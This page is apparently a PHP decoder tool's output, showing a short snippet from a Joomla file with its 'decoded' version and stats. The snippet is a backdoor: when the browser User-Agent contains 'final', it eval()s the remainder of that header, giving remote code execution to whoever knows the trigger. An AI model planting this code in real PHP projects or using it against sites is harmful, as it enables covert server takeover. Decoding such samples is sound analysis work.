Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final..

Decoded Output download

<?  if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; } 
defined('_JEXEC') or die('Restricted access'); ?>

Did this file decode correctly?

Original Code

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }
defined('_JEXEC') or die('Restricted access');

Function Calls

eregi 1
defined 1

Variables

None

Stats

MD5 258a8ab1881103d74e5392d9432ea0a0
Eval Count 0
Decode Time 103 ms